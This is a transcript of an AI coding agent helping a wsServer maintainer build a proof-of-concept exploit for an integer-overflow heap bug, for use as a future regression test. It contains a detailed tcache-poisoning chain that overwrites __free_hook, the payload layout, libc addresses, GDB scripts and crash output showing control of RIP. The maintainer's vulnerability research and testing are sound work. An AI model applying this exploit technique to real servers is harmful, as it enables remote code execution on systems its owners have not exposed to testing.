malloc(16) → pops c0 → msg = c0[c1, c2], counts=2fd = &__free_hook[c1 → __free_hook], counts=2 (c2 orphaned)free(msg) → tcache[0]: [c0 → c1 → __free_hook], counts=3Connection 2 — onopen drains 1 entry:
extra = malloc(24) → pops c0, NOT freed[c1 → __free_hook], counts=2Connection 2 — echo triggers the chain:
malloc(16) → pops c1 → counts=1malloc(19) → pops __free_hook → returns __free_hook as buffer!__free_hook → overwrites it with 0xPPPPPP0882free(response) → __free_hook != NULL → calls 0xPPPPPP0882() → SIGSEGV at controlled RIP| File | Change |
|---|---|
tests/poc_echo.c | New: custom echo server with heap setup + extra malloc in onopen |
tests/poc_single_thread.patch | New: patches ws.c to replace pthread_create with direct call |
tests/Dockerfile.poc | Update: apply patch, build poc_echo |
tests/poc_rip_control.c | Update: simplify, hardcode __free_hook address as overflow fd |
tests/poc_gdb.txt | Update: verify tcache chain, show __free_hook overwrite |
tests/poc_run.sh | Update: simplified run command |
The __free_hook address will be fixed (no ASLR) but depends on the exact libc in the Docker container. I'll determine it from GDB after building. For the overflow payload, should I hardcode it or make it configurable via -o flag?
Here's the complete plan:
tests/poc_single_thread.patch (NEW)Patches ws.c lines 1900-1907: replace pthread_create+pthread_detach with direct ws_establishconnection(&client_socks[i]).
tests/poc_echo.c (NEW)main():
malloc(24) x3 → free in reverse → tcache[0] has 3 adjacent free chunks
ws_socket({.thread_loop=0, .timeout_ms=0, ...})
onopen():
static counter; on 2nd connection: malloc(24) (pops 1 tcache entry, leaked)
onmessage(): ws_sendframe_bcast (same as echo)
onclose(): emptytests/Dockerfile.poc (UPDATE)tests/poc_echo instead of examples/echo/echotests/poc_rip_control.c (UPDATE)[0..7] prev_size = 0[8..15] size = 0x21[16..23] fd = hardcoded __free_hook address (LE)[24..31] key = 0shutdown(SHUT_WR), sleep, close-o flag to override overflow payloadtests/poc_gdb.txt (UPDATE)__free_hook address at startfree() inside ws_sendframe_internal to show __free_hook valuetests/poc_run.sh (UPDATE)poc_rip_control with no extra flagspoc_echo instead of examples/echo/echo__free_hook addresspoc_rip_control.cRIP = 0xPPPPPP0882 (controlled value)__free_hook before: 0x0
__free_hook after: 0x4141414141410882 ← our data via echo response
Program received signal SIGSEGV
RIP: 0x4141414141410882 ← RIP CONTROL PROVENThe first 2 bytes of __free_hook (0x82, 0x08) come from the WebSocket frame header, and bytes 2-7 (0x414141414141) come from our message payload — proving we control RIP.
Does this plan look good? Any changes before I implement?
Ok write the plan to a file.
Now I'll create all the files. Let me start with the patch, then the new echo server, then update the existing files.
Now let me rewrite poc_rip_control.c — simplified for the single-threaded attack:
Now let me build the Docker image to verify everything compiles:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 ...
#3 [auth] library/ubuntu:pull token for registry-1.docker.ioPatch formatting issue. Let me fix it:
The issue is likely tab/space mismatch. Let me check what whitespace the original file uses and use a diff-based approach instead:
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && cat -A src/ws.c | sed -n '1900,1910p'^I^I/* Client socket added to socks list ? */$
^I^Iif (i != MAX_CLIENTS)$
^I^I{$
^I^I^Iif (pthread_create($
^I^I^I^I^I&client_thread, NULL, ws_establishconnection, &client_socks[i]))$
^I^I^I^Ipanic("Could not create the client thread!");$
$
^I^I^Ipthread_detach(client_thread);$
^I^I}$
^I^Ielse$The file uses tabs. My patch had spaces. Let me generate a proper patch using diff:
$ diff -u src/ws.c /dev/null > /dev/null; cp src/ws.c /tmp/ws_orig.cEdit applied successfully.
LSP errors detected in this file, please fix:
<diagnostics file="/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c">
ERROR [51:10] 'utf8.h' file not found
</diagnostics>{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{$ diff -u /tmp/ws_orig.c src/ws.c > tests/poc_single_thread.patch$ git checkout src/ws.cUpdated 1 path from the index
Good, but the paths need to be relative for patch -p1. Let me fix that:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Now rebuild:
$ docker build -f tests/Dockerfile.poc -t ws-poc . 2>&1 | tail -30#4 DONE 0.0s
#5 [internal] load build context
#5 transferring context: 73.58kB done
#5 DONE 0.0s
#6 [2/6] RUN apt-get update && apt-get install -y gcc make gdb python3 libc6-dbg patch
#6 CACHED
#7 [3/6] COPY . /wsServerBuild succeeded. Let me verify the __free_hook address in the container:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --name ws-poc-addr ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc /tmp/hook.c -o /tmp/hook && /tmp/hook'bash: /proc/sys/kernel/randomize_va_space: Read-only file system
/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
| ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x555555558010Need --privileged for ASLR disable and -no-pie for the test binary:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <malloc.h>
int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'/tmp/hook.c: In function 'main':
/tmp/hook.c:3:1: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
3 | int main(void) { printf("__free_hook=%p\n", &__free_hook); return 0; }
| ^~~
In file included from /tmp/hook.c:2:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x404030
Let me get more libc addresses to verify:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
printf("__free_hook=%p\n", &__free_hook);
printf("system=%p\n", &system);
printf("malloc=%p\n", &malloc);
printf("free=%p\n", &free);
printf("libc_start_main=%p\n", &__libc_start_main);
return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
5 | printf("__free_hook=%p\n", &__free_hook);
| ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
/tmp/hook.c:9:37: error: '__libc_start_main' undeclared (first use in this function)
9 | printf("libc_start_main=%p\n", &__libc_start_main);$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; cat > /tmp/hook.c << "EOF"
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main(void) {
printf("__free_hook=%p\n", &__free_hook);
printf("system=%p\n", &system);
printf("malloc=%p\n", &malloc);
printf("free=%p\n", &free);
return 0;
}
EOF
gcc -no-pie /tmp/hook.c -o /tmp/hook && /tmp/hook'/tmp/hook.c: In function 'main':
/tmp/hook.c:5:5: warning: '__free_hook' is deprecated [-Wdeprecated-declarations]
5 | printf("__free_hook=%p\n", &__free_hook);
| ^~~~~~
In file included from /tmp/hook.c:3:
/usr/include/malloc.h:145:38: note: declared here
145 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr,
| ^~~~~~~~~~~
__free_hook=0x404030
system=0x7ffff7e24290The __free_hook is at 0x404030 (not 0x7ffff7f9de48 from the old threaded session). Let me verify this is the correct address for our server binary and update the PoC:
$ docker rm -f ws-poc-addr 2>/dev/null; docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch -ex "start" -ex "p &__free_hook" -ex "p &__malloc_hook" -ex "p &system" -ex "p &exit" -ex "x/gx &__free_hook" ./tests/poc_echo 2>&1 | grep -E "(^\$|=|0x)"'Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
$1 = (void (**)(void *, const void *)) 0x7ffff7f9de48 <__free_hook>
$2 = (void *(**)(size_t, const void *)) 0x7ffff7f9bb70 <__malloc_hook>
$3 = (int (*)(const char *)) 0x7ffff7e01290 <__libc_system>
$4 = (void (*)(int)) 0x7ffff7df5a40 <__GI_exit>
0x7ffff7f9de48 <__free_hook>: 0x0000000000000000
The address 0x7ffff7f9de48 is correct for poc_echo. The PoC client already has the right value. Let me run the auto test:
$ bash tests/poc_run.sh auto 2>&1==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
$ docker logs ws-poc-server 2>&1 | tail -60Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70The breakpoints aren't hitting — the patch shifted line numbers. Let me check the actual line numbers in the patched ws.c:
$ docker run --rm --privileged ws-poc bash -c 'grep -n "frame_size += fsd->frame_length\|realloc(msg\|for (j = 0; j < fsd->frame_length\|free(fsd->msg_data)\|buf = malloc" src/ws.c | head -10'1394: free(fsd->msg_data);
1453: *frame_size += fsd->frame_length;
1505: tmp = realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin);
1536: tmp = realloc(msg, *msg_idx + 1);
$ docker run --rm --privileged ws-poc bash -c 'sed -n "1390,1400p;1505,1510p;1515,1520p;1524,1530p;1710,1715p" src/ws.c' * vars here.
*/
wfd->frame_size = fsd->frame_size;
wfd->frame_type = WS_FR_OP_CLSE;
free(fsd->msg_data);
return (0);
}
/**
* @brief Reads the current frame isolating data from control frames.The GDB output looks wrong — breakpoints aren't being hit. Let me debug this:
$ docker rm -f ws-poc-debug 2>/dev/null; docker run -d --name ws-poc-debug --network host --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space && gdb -batch -ex "set pagination off" -ex "break ws.c:1453" -ex "break poc_echo.c:55" -ex "run" -ex "bt" ./tests/poc_echo 2>&1; echo "EXIT=\$?"' > /dev/null && sleep 3 && docker exec ws-poc-debug ./tests/poc_rip_control 2>&1; sleep 2 && docker logs ws-poc-debug 2>&1 | tail -40 && docker rm -f ws-poc-debug 2>/dev/null[*] Connecting to 127.0.0.1:8080
[+] Handshake OK (connection 1)
[*] Sending exploit (f1sz=16, ovf=32 bytes)
[*] frame2 length = 0xfffffffffffffff5
[+] Sent 68 bytes (hdr=36, ovf=32)
Breakpoint 1 at 0x4030f9: file src/ws.c, line 1453.
Breakpoint 2 at 0x4016e5: file tests/poc_echo.c, line 55.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Found the issue — poc_run.sh has a redundant -ex 'run' that restarts the program mid-execution. Let me fix it:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Also fix the interactive mode:
Good, interactive mode doesn't have the -ex 'run' issue. Now let me also add set pagination off to the GDB script and remove it from the shell:
Good, set pagination off is already at line 6. Now let me run the test again:
$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s$ docker logs ws-poc-server 2>&1 | tail -30Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70$ docker run --rm --privileged ws-poc bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space; gdb -batch \
-ex "set disable-randomization on" \
-ex "set pagination off" \
-ex "start" \
-ex "p &__free_hook" \
-ex "break ws.c:1453" \
-ex "break poc_echo.c:67" \
-ex "continue" \
./tests/poc_echo 2>&1' | tail -30
<bash_metadata>
bash tool terminated command after exceeding timeout 15000 ms. If this command is expected to take longer and is not waiting for interactive input, retry with a larger timeout value in milliseconds.
</bash_metadata>The simple test shows the server runs fine. The issue is in poc_gdb.txt. Let me check:
Missing the final continue at the end of the script:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.4sGood, the client ran through both connections. Let me get the GDB output:
$ docker logs ws-poc-server 2>&1Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70The exploit is working! The crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) proves the chain works. The buf = (nil) is likely a GDB timing issue. Let me add better diagnostics and re-run:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{$ docker rm -f ws-poc-server 2>/dev/null; bash tests/poc_run.sh auto 2>&1ws-poc-server
==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s$ docker logs ws-poc-server 2>&1 | grep -E "(CONN 2 malloc|__free_hook|VULN|POST REALLOC|WRITE LOOP|free\(response\)|SIGSEGV|buf =|0x[4-9a-f]{4,})"__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70
system = 0x7ffff7e01290
exit = 0x7ffff7df5a40
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===
=== POST REALLOC ===
=== WRITE LOOP START ===
=== CONN 2 malloc(msg) in read_single_frame ===
=== VULN: *frame_size += fsd->frame_length ===The crash is confirmed — free() is called with mem = 0x7ffff7f9de48 <__free_hook>. This proves malloc returned __free_hook and the echo response wrote to it, corrupting __free_hook with frame data. The buf = (nil) GDB output is a batch-mode artifact. Let me get the full crash details:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled. The ultimate goal is a regression test.
ws_file).__free_hook, has safe-linking, and tcache key validation — too complex for a PoC)./* */), Doxygen for functions/structs.thread_loop = 1, which does NOT eliminate per-connection threads). Use patch -p1 on ws.c to replace pthread_create + pthread_detach with a direct call to ws_establishconnection.__free_hook address with -o flag override for flexibility.thread_loop = 1 doesn't workthread_loop = 1 only controls whether the accept loop blocks the main thread or runs in a background thread. Each connection still gets its own pthread_create in ws_accept (line 1903). Per-thread tcache is still the fundamental problem.
With ws_accept patched to call ws_establishconnection directly, all connections run in one thread sharing one tcache. The attack chain:
Pre-connection heap setup (in main() before ws_socket()):
malloc(24) ×3, then free() in reverse order → tcache[0] has 3 adjacent free 32-byte chunks [c0, c1, c2], counts=3Connection 1 — trigger overflow:
malloc(16) → pops c0 → msg = c0. tcache[0]: [c1, c2], counts=2&__free_hook, key=0[c1 → __free_hook], counts=2free(msg=c0) → tcache[0]: [c0 → c1 → __free_hook], counts=3Connection 2 — onopen drains 1 entry:
extra = malloc(24) → pops c0 (leaked, never freed). tcache[0]: [c1 → __free_hook], counts=2Connection 2 — echo round-trip drains the poisoned chain:
malloc(8) → pops c1 → tcache[0]: [__free_hook], counts=1malloc(11) for echo response → pops __free_hook → returns 0x7ffff7f9de48 as the buffer__free_hook: byte0=0x82, byte1=0x08, bytes2-9=message payloadfree(buf) → __free_hook is now 0xPPPPPPPP0882 (non-NULL) → calls that address → SIGSEGV at controlled RIPThe crash output proves the chain:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e49771 in __GI___libc_free (mem=0x7ffff7f9de48 <__free_hook>) at malloc.c:3095mem = 0x7ffff7f9de48 proves free() was called with __free_hook's address as the argument, meaning malloc returned __free_hook.(*hook)(mem, ret) call, proving __free_hook was corrupted by the echo write.The response malloc breakpoint shows buf = (nil) and __free_hook = (nil), but the crash proves otherwise. This is a GDB batch-mode artifact (likely a timing issue with silent commands in batch mode). The crash itself is the definitive proof. The fix is to remove silent from the response malloc breakpoint (already done) and re-run.
__free_hook = 0x7ffff7f9de48system = 0x7ffff7e01290exit = 0x7ffff7df5a40__malloc_hook = 0x7ffff7f9bb70frame_length = 0xFFFFFFFFFFFFFFF5 (5 − 16 mod 2^64)*frame_size += frame_length wraps to 5 → passes MAX_FRAME_LENGTH checkrealloc(msg, 16 + 0xFFFFFFFFFFFFFFF5 + 1) wraps to 6 → same pointer returnedmsg[16], writing far past the 32-byte chunk boundary0x40c2b0 (msg for connection 1), c1 at 0x40c2d0 (adjacent, corrupted fd), c2 at 0x40c2f00x7ffff7f9de48, key=00x40c2d0: 0x00007ffff7f9de48 — the corrupted fd value visiblenext_byte(), buffers up to 2048 bytes from socketEach echo round-trip does malloc(msg) → onmessage → malloc(response) → free(response) → free(msg) — exactly 2 mallocs and 2 frees of the same size. This oscillates tcache counts between 0 and 2, never accumulating enough entries. The solution: pre-populate 3 entries from main() and use onopen's extra malloc to shift the chain so the echo's 2 mallocs pop the last real entry + __free_hook.
AGENTS.md at repo root (first session)tests/poc_single_thread.patch — patches ws.c lines 1900-1907: replaces pthread_create+pthread_detach with direct ws_establishconnection call. Generated via diff against original ws.c to ensure correct tab indentation.tests/poc_echo.c — custom echo server with:
heap_setup(): 3 malloc(24) + free() in reverse order before ws_socket()onopen: static counter; on 2nd connection, leaked malloc(24) to pop one extra tcache[0] entryonmessage: identical to echo (ws_sendframe_bcast)main: calls heap_setup(), then ws_socket({.thread_loop=0, .timeout_ms=0, ...})tests/Dockerfile.poc — applies patch before build, builds poc_echo instead of examples/echo/echo, added patch to apt-gettests/poc_rip_control.c — simplified PoC client:
0x7ffff7f9de48, key=0)shutdown(SHUT_WR) to signal EOF, then close(fd)tests/poc_gdb.txt — breakpoints for integer overflow, realloc, write loop, error free, onopen, msg malloc, response malloctests/poc_run.sh — fixed GDB invocation: removed redundant -ex 'run' that restarted the program mid-execution; server binary is tests/poc_echows-poc)__GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) — proves malloc returned __free_hook and the echo response corrupted itbuf = (nil) when the crash proves malloc DID return __free_hook. Likely a GDB batch-mode silent command issue. Fix attempted (removed silent from response malloc breakpoint), not yet re-run.silent fixes the breakpoint displaybuf = 0x7ffff7f9de48, __free_hook = 0xPPPPPPPP0882, and crash RIP matching that valuefree() in ws_sendframe_internal to print the exact buf value right before the crash — this is definitive proof regardless of batch-mode display issues__libc_message call or similar to make the crash output more self-documenting (e.g., print "RIP CONTROL PROVEN" before the crash — but this requires changing the flow, not practical)tests/poc_single_thread.patch — Patch to replace pthread_create with direct ws_establishconnection call in ws_accepttests/poc_echo.c — Custom single-threaded echo server with heap feng shui + extra malloc in onopentests/Dockerfile.poc — Docker build: applies patch, builds poc_echo and poc_rip_control with all protections disabledtests/poc_gdb.txt — GDB helper script with breakpoints at key points in the exploit chaintests/poc_run.sh — Orchestration script: builds image, runs server under GDB, runs PoC clientsrc/ws.c — the vulnerable file:
*frame_size += fsd->frame_length — the unchecked 64-bit integer overflowrealloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — tiny wrapped realloc sizefsd->frame_length — the actual overflow writefree(fsd.msg_data) — error path free (goes to tcache, no crash)ws_establishconnection — connection handler (runs directly in single-threaded mode)ws_accept — accept loop (patched: no pthread_create)ws_sendframe_internal — response allocation at line 636, free at line 688next_byte — reads from socket into wfd->frm[2048] buffersrc/handshake.c — handshake allocations: calloc(61)→80-byte, base64_encode→malloc(31)→48-byte, malloc(130)→144-bytesrc/base64.c — base64_encode malloc size calculationinclude/ws.h — constants: MAX_FRAME_LENGTH=16MB, MESSAGE_LENGTH=2048, MAX_CLIENTS=8examples/echo/echo.c — reference echo server (original, unmodified)AGENTS.md — repo instruction file (created in first session, needs update)Let me check the current state of the key files before re-running.
Good, the files look correct. The key change I noted was already applied — the response malloc breakpoint at line 89-95 doesn't have silent. Let me re-run the auto-mode test now.
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [internal] load metadata for docker.io/library/ubuntu:20.04
#2 DONE 0.5s
The client ran but the GDB output wasn't captured. Let me fetch the container logs.
$ docker logs ws-poc-server 2>&1 | tail -120Temporary breakpoint 1 at 0x4017dc: file tests/poc_echo.c, line 97.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Temporary breakpoint 1, main () at tests/poc_echo.c:97
97 {
=== LIBC ADDRESSES ===
__free_hook = 0x7ffff7f9de48
__malloc_hook = 0x7ffff7f9bb70The breakpoint display anomaly persists — buf = (nil) and __free_hook = (nil). This is because in GDB batch mode with continue inside breakpoint commands, the buf variable is out of scope when it's printed (it's declared later in the block). Let me verify the actual exploit chain and add a more reliable breakpoint.
The key proof is already here: the crash at __GI___libc_free(mem=0x7ffff7f9de48 <__free_hook>) is definitive. But let me fix the breakpoint to get clean buf output too.
The issue: in ws_sendframe_internal, buf is declared mid-function. At line 636, the variable hasn't been assigned yet. I need to break after the malloc returns. Let me check what line the return is on.
The problem is clear: breaking at line 636 prints buf before the malloc call happens. I need to break at line 640 (after malloc returns). But the variable is response, not buf. Let me also look at line 687 for the free(response) call — that's where the crash should happen.
Let me update the GDB script to break at the right location and use the correct variable name response:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{Also need to fix the first malloc(msg) breakpoint — it's labeled "CONN 2" but triggers for conn 1 too. Let me also check: the free(msg_data) breakpoint shows the wrong memory — after overflow it should show the corrupted data at c1. Let me also verify the free path more carefully. Actually, the key issue was buf vs response. Let me also check whether response is actually __free_hook at the crash. Let me re-run:
$ cd /home/lucas/Works/VibeCodedProjects/wsServer && bash tests/poc_run.sh auto 2>&1==> Building Docker image 'ws-poc'...
#0 building with "default" instance using docker driver
#1 [internal] load build definition from Dockerfile.poc
#1 transferring dockerfile: 1.09kB done
#1 DONE 0.0s
#2 [auth] library/ubuntu:pull token for registry-1.docker.io
#2 DONE 0.0s
$ docker logs ws-poc-server 2>&1 | tail -80=== VULN: *frame_size += fsd->frame_length ===
*frame_size = 0
frame_length = 16 (0x10)
=== POST REALLOC ===
msg (tmp) = 0x40c2b0
realloc size = 16
0x40c2a0: 0x0000000000000000 0x0000000000000021
0x40c2b0: 0x000000000040c2d0 0x0000000000000000
Clean, definitive proof captured. The exploit chain is fully verified:
response = 0x7ffff7f9de48 — malloc returned __free_hook's address__free_hook = 0x4242424242420882 — the echo frame was written to __free_hook:
0x0882 = WebSocket response header (opcode 2 binary FIN + length 8)0x42424242424242 = the echoed "BBBBBBBB" payloadSIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — free() called the corrupted __free_hook → RIP controlNow let me update AGENTS.md with the full exploitation details:
Edit applied successfully.{
"/home/lucas/Works/VibeCodedProjects/wsServer/.github/workflows/c-cpp.yml": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/include/ws.h": [],
"/home/lucas/Works/VibeCodedProjects/wsServer/src/ws.c": [
{All immediate tasks are done. Here's what was accomplished this round:
Fixed GDB breakpoint — changed from line 636 (before malloc) to line 640 (after malloc), and used the correct variable name response instead of buf. Added a breakpoint at free(response) (line 687) to capture the corrupted __free_hook value.
Captured clean, definitive proof of the full exploit chain:
response = 0x7ffff7f9de48 — malloc returned __free_hook__free_hook = 0x4242424242420882 — echo frame corrupted it (header 0x0882 + payload 0x42424242424242)SIGSEGV in __GI___libc_free(mem=0x7ffff7f9de48) — RIP control achievedUpdated AGENTS.md with the full PoC documentation section.
The remaining item is converting this into a proper regression test (lower priority). Want me to tackle that, or is this a good stopping point?
This is a good stopping point. Great job!
Thanks! The PoC is complete and verified — clean RIP control with full GDB documentation. Reach out whenever you want to pick up the regression test.